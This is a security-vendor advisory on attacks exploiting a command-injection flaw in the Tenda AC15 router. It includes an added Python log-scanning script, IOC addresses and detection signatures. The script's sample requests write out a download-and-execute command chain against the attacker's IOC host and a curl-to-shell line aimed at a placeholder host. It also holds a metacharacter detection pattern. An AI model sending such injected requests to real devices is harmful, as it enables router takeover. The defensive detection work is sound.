Attackers actively targeting Tenda WiFi router vulnerability

SonicWall Capture Labs Threat Research team observes attackers actively exploiting the arbitrary remote code execution vulnerability reported in the Tenda AC15 router. The Tenda AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking.

CVE-2020-10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName parameter. The input parameter deviceName is not validated and its value is passed directly into a doSystemCmd function, so shell metacharacters embedded in the parameter result in arbitrary command execution on the router.

Exploit:

In the exploit request captured below, the attacker passes the malicious shellcode through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it.

When usb.sh is executed, it downloads more payloads from the attacker's server 5.252.194.29 and executes them one by one.
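The request pattern described above can be checked in web-server or proxy logs without relying on a vendor signature. The following Python script is an added example written for this post, not code from SonicWall or from Tenda firmware. It applies the allowlist that the setUsbUnload handler should have enforced on deviceName (the `^[A-Za-z0-9_-]{1,32}$` pattern is an assumption about what a legitimate block-device name looks like), flags any value on that endpoint that fails the allowlist or contains shell metacharacters, decodes repeatedly to catch double-encoded variants, and cross-references any IPv4 address in the payload against the IOCs listed in this post. The sample requests are constructed; the third one is modelled on the captured download-and-execute chain and the fourth uses the documentation address 198.51.100.7 as a placeholder attacker host.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# IOCs published in this post.
KNOWN_IOCS = {"185.39.11.105", "5.252.194.29"}

# Endpoint affected by CVE-2020-10987.
VULN_PATH = "/goform/setUsbUnload"

# Assumed allowlist: what a legitimate USB block-device name should look like.
DEVICE_NAME_OK = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

# Characters that let an attacker break out of the doSystemCmd argument.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def fully_decode(value, max_rounds=3):
    """URL-decode until the value stops changing, to catch double encoding."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(method, target, body=""):
    """Return a finding dict for a suspicious setUsbUnload request, else None.

    target is the request-target from the request line (path plus query);
    body is the raw form-encoded POST body, if any.
    """
    url = urlsplit(target)
    if url.path != VULN_PATH:
        return None

    params = parse_qs(url.query, keep_blank_values=True)
    if body:
        params.update(parse_qs(body, keep_blank_values=True))

    for raw in params.get("deviceName", []):
        value = fully_decode(raw)
        if DEVICE_NAME_OK.match(value):
            continue  # passes the allowlist the firmware should have applied
        ips = set(IPV4_RE.findall(value))
        ioc_hits = sorted(ips & KNOWN_IOCS)
        return {
            "method": method,
            "path": url.path,
            "deviceName": value,
            "metachars": sorted(set(SHELL_META.findall(value))),
            "ioc_hits": ioc_hits,
            "severity": "high" if ioc_hits else "medium",
        }
    return None


def scan(requests):
    """Run inspect_request over (method, target, body) tuples; return findings."""
    findings = []
    for method, target, body in requests:
        finding = inspect_request(method, target, body)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample traffic (not captured data).
SAMPLE_REQUESTS = [
    # Benign unmount of a USB device.
    ("GET", "/goform/setUsbUnload?deviceName=sda1", ""),
    # Unrelated endpoint; metacharacters here are not in scope.
    ("GET", "/goform/SetSysTimeCfg?time=2020-01-01%2012%3A00%3A00", ""),
    # Modelled on the captured request: chained download-and-execute from a known IOC.
    ("POST", "/goform/setUsbUnload",
     "deviceName=sda1%3Bwget%20http%3A%2F%2F5.252.194.29%2Fusb.sh"
     "%20-O%20%2Ftmp%2Fusb.sh%3Bsh%20%2Ftmp%2Fusb.sh"),
    # Double-encoded variant pointing at a placeholder host.
    ("GET", "/goform/setUsbUnload?deviceName=sda1%253Bcurl%2520http%253A%252F%252F"
     "198.51.100.7%252Fx%257Csh", ""),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f["severity"].upper(), f["method"], f["path"],
              "metachars=%s ioc_hits=%s" % (f["metachars"], f["ioc_hits"]))
        print("  deviceName:", f["deviceName"])
```

Using the allowlist rather than only a metacharacter blocklist as the trigger means an encoded or obfuscated payload that avoids the listed characters still surfaces as a medium finding, and the IOC cross-reference promotes anything that reaches out to the published addresses to high.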

Trend Chart:

IOC:

185.39.11.105
5.252.194.29

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13634 Suspicious Request URI 17
IPS: 5811 Web Application Suspicious File Upload 1 -c2
IPS: 3141 Web Application Suspicious File Upload 11
IPS: 15028 Web Application Suspicious File Upload 18


The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.